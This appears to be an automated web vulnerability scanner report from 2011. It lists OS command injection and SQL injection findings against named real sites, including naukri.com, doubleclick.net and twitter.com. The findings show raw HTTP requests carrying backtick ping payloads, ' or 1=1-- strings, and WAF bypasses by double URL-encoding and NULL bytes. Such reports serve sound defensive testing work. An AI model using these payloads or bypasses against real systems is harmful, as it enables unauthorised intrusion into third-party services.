35.218. http://www.townnews365.com/users/manage/global/resources/images/icon-03.gif

35.219. http://www.townnews365.com/users/manage/global/resources/styles/print.css

35.220. http://www.townnews365.com/users/manage/service/purchase_select/

35.221. http://www.townnews365.com/wheels_forms

35.222. http://www.townnews365.com/wrapper-company/

35.223. http://www.vccedge.com/files/vccircle_favicon.ico

35.224. http://www.vccircle.com/files/vccircle_favicon.ico

35.225. http://www.vccircle.com/themes/vccircle/images/logo.gif



1. OS command injection  next
There are 3 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. http://jobsearch.naukri.com/callcenter-ites-jobs/ [_nkjs cookie]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobsearch.naukri.com
Path:   /callcenter-ites-jobs/

Issue detail

The _nkjs cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the _nkjs cookie. The application took 20185 milliseconds to respond to the request, compared with 661 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /callcenter-ites-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163`ping%20-c%2020%20127.0.0.1`; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:52 GMT
Content-Length: 84960
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.2. http://jobsearch.naukri.com/information-technology-jobs/ [_nkjs cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://jobsearch.naukri.com
Path:   /information-technology-jobs/

Issue detail

The _nkjs cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the _nkjs cookie. The application took 19699 milliseconds to respond to the request, compared with 632 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163`ping%20-c%2020%20127.0.0.1`; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=159336229; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 13:59:57 GMT
Content-Length: 79225
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

1.3. http://w28.naukri.com/advertiser/bms_logimpressions.php [banlist parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://w28.naukri.com
Path:   /advertiser/bms_logimpressions.php

Issue detail

The banlist parameter appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the banlist parameter. The application took 76094 milliseconds to respond to the request, compared with 11 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /advertiser/bms_logimpressions.php?banlist=371305,378465,29836,378317`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
Referer: http://www.naukri.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:07 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

2. SQL injection  previous  next
There are 83 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://cm.g.doubleclick.net/pixel [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pixel'?nid=c44786835&CriteoUserId=328be210-c808-4360-8f7b-dd0b2aa56e02&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 14:26:28 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 11878
X-XSS-Protection: 1; mode=block

<!DOCTYPE html>
<html lang=en>
<meta charset=utf-8>
<title>Error 404 (Not Found)!!1</title>
<style>
*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:
...[SNIP]...

Request 2

GET /pixel''?nid=c44786835&CriteoUserId=328be210-c808-4360-8f7b-dd0b2aa56e02&rtbId=4 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.us.criteo.com/dis/dis.aspx?p1=v%3D2%26wi%3D7712352%26pt1%3D0%26pt2%3D1%26si%3D1&t1=sendEvent&p=2406&c=2&cb=66269283823
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response 2

HTTP/1.1 403 Forbidden
Content-Length: 1207
Content-Type: text/html
Date: Sat, 14 May 2011 14:26:31 GMT
Server: GFE/2.0

<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"/><title>Sorry...</title><style> body { font-family: verdana, arial, sans-serif; background-color: #fff; color: #000; }</s
...[SNIP]...

2.2. http://jobsearch.naukri.com/information-technology-jobs/ [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://jobsearch.naukri.com
Path:   /information-technology-jobs/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 82395615'%20or%201%3d1--%20 and 82395615'%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=15933622982395615'%20or%201%3d1--%20; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response 1

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:02:26 GMT
Content-Length: 79233
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
.naukri.com/mynaukri/";
var sr_f = "mn_newsmartsearch.php";
var jd_f = "mn_newminnernew.php";
var crit_u = "&qcatid=4&qi[]=25&qs=r&qt=all&enableRoleMapping=y&qd=1&mode=7";
var xid = "&xid=130538174320539700";
var xq = "&xq=aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ";
var jd_url = "?xz=3_9_2&xo=";
var fj_url = "?xz=3_10_2&";
var vsj_url = "?xz=3_7_3&js=1";
var vaj_url = "?xz=8_0_3&js=1";
var rc_url = "?xz=3_1_2&sws=&js=1&rs=&id=&bbtype=";
var ic_url = "?xz=3_2_2&sws=&js=1&rs=&id=";
var tfa_url="?xz=3_17_2&sws=&js=1&rs=&id=&bbtype="
var tr_url="?xz=3_18_2&sws=&js=1&rs=&id=&bbtype="
var fc_url = "?xz=3_5_2&rs=1&sws=&js=1";
var fc_jd_url = "?xz=3_12_2&xo=";
var frc_url = "?xz=3_3_2&sws=&rs=&id=&bbtype=&js=1";
var jtc_url = "?xz=3_4_2&sws=&rs=&id=&bbtype=&js=1";
var imgurl = "http://static.naukimg.com/jobsrch/";
var cookieDomainName = ".naukri.com";
var var_xz1 = '3';
var var_xz2 = '9';
var var_xz3 = '2';
var domain_cat="http://jobsearch.naukri.com/";

var val_exp="-1";
var val_farea="-1";
var val_ctc="-1";
var val_qx = '-1';

var id='&id=';
var paidcl='';
var mynaukurl = 'http://my.naukri.com/';
var recommends= "https://login.naukri.com/nLogin/Login.php?URL=http%3A%2F%2Fjobsearch.naukri.com%2Fmynaukri%2Fjs_recommends.php";
var mynaukLoginUrl = 'http://login.naukri.com/';
var l_u = 'http://apply.naukri.com/Apply/service/mn_ApplyServiceOne.php?id=';
var reportProblem = 'http://w5.naukri.com/fdbck/main/feedback.php';
var user='';
var username = '';

var applyLeft='50';
var mal='150';
var link='3';
var careersrv='http://w5.naukri.com/resbilling/main/rservices.php';
var HIDDENVARS="<input type=\"hidden\" name=\"xz\" value=\"3_9_2\"><input type=\"hidden\" name=\"xt\" value=\"bp\"><input type=\"hidden\" name=\"xid\" value=\"130538174320539700\"><input type=\"hidden\" name=\"arrxz[]\" value=\"3\"><input type=\"hidden\" name=\"arrxz[]\" value=\"9\"><input type=\"hidden\" name=\"arrxz[]\" value=\"2\"><input type=\"hidden\" name=\"xq\" value=\"aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ\"><input type=\"hidden\" name=\"qcatid\" value=\"4\"><input typ
...[SNIP]...

Request 2

GET /information-technology-jobs/ HTTP/1.1
Host: jobsearch.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _nkjs=0.52285400+1305381509380163; test=naukri.com; __utma=159336229.794915474.1305381519.1305381519.1305381519.1; __utmc=15933622982395615'%20or%201%3d2--%20; __utmz=159336229.1305381519.1.1.utmccn=(referral)|utmcsr=naukri.com|utmcct=/tieups/tieups.php|utmcmd=referral; HitsFromTieup=9902; wExp=N; TieupFromTMS=10; __utmb=159336229

Response 2

HTTP/1.1 200 OK
Server: NWS/1.0. (Unix) mod_ssl/1.0. OpenSSL/0.9.8b PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Type: text/html
Date: Sat, 14 May 2011 14:02:27 GMT
Content-Length: 79245
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
.naukri.com/mynaukri/";
var sr_f = "mn_newsmartsearch.php";
var jd_f = "mn_newminnernew.php";
var crit_u = "&qcatid=4&qi[]=25&qs=r&qt=all&enableRoleMapping=y&qd=1&mode=7";
var xid = "&xid=130538174548894100";
var xq = "&xq=aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ";
var jd_url = "?xz=3_9_2&xo=";
var fj_url = "?xz=3_10_2&";
var vsj_url = "?xz=3_7_3&js=1";
var vaj_url = "?xz=8_0_3&js=1";
var rc_url = "?xz=3_1_2&sws=&js=1&rs=&id=&bbtype=";
var ic_url = "?xz=3_2_2&sws=&js=1&rs=&id=";
var tfa_url="?xz=3_17_2&sws=&js=1&rs=&id=&bbtype="
var tr_url="?xz=3_18_2&sws=&js=1&rs=&id=&bbtype="
var fc_url = "?xz=3_5_2&rs=1&sws=&js=1";
var fc_jd_url = "?xz=3_12_2&xo=";
var frc_url = "?xz=3_3_2&sws=&rs=&id=&bbtype=&js=1";
var jtc_url = "?xz=3_4_2&sws=&rs=&id=&bbtype=&js=1";
var imgurl = "http://static.naukimg.com/jobsrch/";
var cookieDomainName = ".naukri.com";
var var_xz1 = '3';
var var_xz2 = '9';
var var_xz3 = '2';
var domain_cat="http://jobsearch.naukri.com/";

var val_exp="-1";
var val_farea="-1";
var val_ctc="-1";
var val_qx = '-1';

var id='&id=';
var paidcl='';
var mynaukurl = 'http://my.naukri.com/';
var recommends= "https://login.naukri.com/nLogin/Login.php?URL=http%3A%2F%2Fjobsearch.naukri.com%2Fmynaukri%2Fjs_recommends.php";
var mynaukLoginUrl = 'http://login.naukri.com/';
var l_u = 'http://apply.naukri.com/Apply/service/mn_ApplyServiceOne.php?id=';
var reportProblem = 'http://w5.naukri.com/fdbck/main/feedback.php';
var user='';
var username = '';

var applyLeft='50';
var mal='150';
var link='3';
var careersrv='http://w5.naukri.com/resbilling/main/rservices.php';
var HIDDENVARS="<input type=\"hidden\" name=\"xz\" value=\"3_9_2\"><input type=\"hidden\" name=\"xt\" value=\"bp\"><input type=\"hidden\" name=\"xid\" value=\"130538174548894100\"><input type=\"hidden\" name=\"arrxz[]\" value=\"3\"><input type=\"hidden\" name=\"arrxz[]\" value=\"9\"><input type=\"hidden\" name=\"arrxz[]\" value=\"2\"><input type=\"hidden\" name=\"xq\" value=\"aP2KFaP1KiP0LBQBaP3KsP6PJqcatidJLsP1PJ4JLsP2PJqiJLaP1KiP0LsP2PJ25JLQsP2PJqlJLsP0PJJLQQ\"><input type=\"hidden\" name=\"qcatid\" value=\"4\"><input typ
...[SNIP]...

2.3. http://my.naukri.com/EmploymentDetails/view [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://my.naukri.com
Path:   /EmploymentDetails/view

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /EmploymentDetails/view%2527 HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 14 May 2011 14:13:14 GMT
Connection: close

Request 2

GET /EmploymentDetails/view%2527%2527 HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.3
Location: https://login.naukri.com/nLogin/Login.php?msg=3&URL=http%3A%2F%2Fmy.naukri.com%2FEmploymentDetails%2Fview%252527%252527
Vary: Accept-Encoding
Content-Length: 0
Date: Sat, 14 May 2011 14:13:14 GMT
Connection: close


2.4. http://my.naukri.com/NewProfile/listProfiles [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://my.naukri.com
Path:   /NewProfile/listProfiles

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /NewProfile/listProfiles HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.5
Content-Length: 0
Vary: Accept-Encoding
Date: Sat, 14 May 2011 14:13:15 GMT
Connection: close

Request 2

GET /NewProfile/listProfiles HTTP/1.1
Host: my.naukri.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)''
Connection: close

Response 2

HTTP/1.1 302 Moved Temporarily
Server: naukri.comnginx/0.7.62
Content-Type: text/html
X-Powered-By: PHP/5.2.3
Location: https://login.naukri.com/nLogin/Login.php?msg=3&URL=http%3A%2F%2Fmy.naukri.com%2FNewProfile%2FlistProfiles
Vary: Accept-Encoding
Content-Length: 0
Date: Sat, 14 May 2011 14:13:15 GMT
Connection: close


2.5. http://search.twitter.com/search.json [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://search.twitter.com
Path:   /search.json

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /search.json?q=techcircle&include_rts=true&callback=TWTR.Widget.receiveCallback_1&rpp=50&since_id=69446875345981440&refresh=true&clientsource=TWITTERINC_WIDGET&1305397212624=cachebust HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response 1

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:24:34 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 995942193
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-11-sr3.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 18:29:34 GMT
Connection: close
Content-Length: 90

TWTR.Widget.receiveCallback_1({"error":"You have been rate limited. Enhance your calm."});

Request 2

GET /search.json?q=techcircle&include_rts=true&callback=TWTR.Widget.receiveCallback_1&rpp=50&since_id=69446875345981440&refresh=true&clientsource=TWITTERINC_WIDGET&1305397212624=cachebust HTTP/1.1
Host: search.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305368954.1

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 18:24:34 GMT
Server: hi
Vary: Accept-Encoding
Status: 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: max-age=15, must-revalidate, max-age=300
X-Varnish: 245133881
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aap-15-sr3.prod.twitter.com
X-Cache: MISS
Expires: Sat, 14 May 2011 18:29:34 GMT
Connection: close
Content-Length: 330

TWTR.Widget.receiveCallback_1({"results":[],"max_id":69446875345981440,"since_id":69446875345981440,"refresh_url":"?since_id=69446875345981440&q=techcircle","results_per_page":50,"page":1,"warning":"a
...[SNIP]...

2.6. http://w28.naukri.com/advertiser/bms_hits.php [banner parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://w28.naukri.com
Path:   /advertiser/bms_hits.php

Issue detail

The banner parameter appears to be vulnerable to SQL injection attacks. The payloads 11435646'%20or%201%3d1--%20 and 11435646'%20or%201%3d2--%20 were each submitted in the banner parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /advertiser/bms_hits.php?banner=37846511435646'%20or%201%3d1--%20&othersrcp= HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 302 Found
Date: Sat, 14 May 2011 13:58:18 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Location: http://www.bajajngp.com
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

Request 2

GET /advertiser/bms_hits.php?banner=37846511435646'%20or%201%3d2--%20&othersrcp= HTTP/1.1
Host: w28.naukri.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test=naukri.com; __utma=159336229.1771676399.1305381499.1305381499.1305381499.1; __utmb=159336229; __utmc=159336229; __utmz=159336229.1305381499.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 13:58:19 GMT
Server: NWS/1.0. (Unix) PHP/5.2.3
X-Powered-By: PHP/5.2.3
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html


2.7. http://www.townnews.com/calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews.com
Path:   /calendar/asset_manager/event_f229e406-7506-11e0-b056-001cc4c03286.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

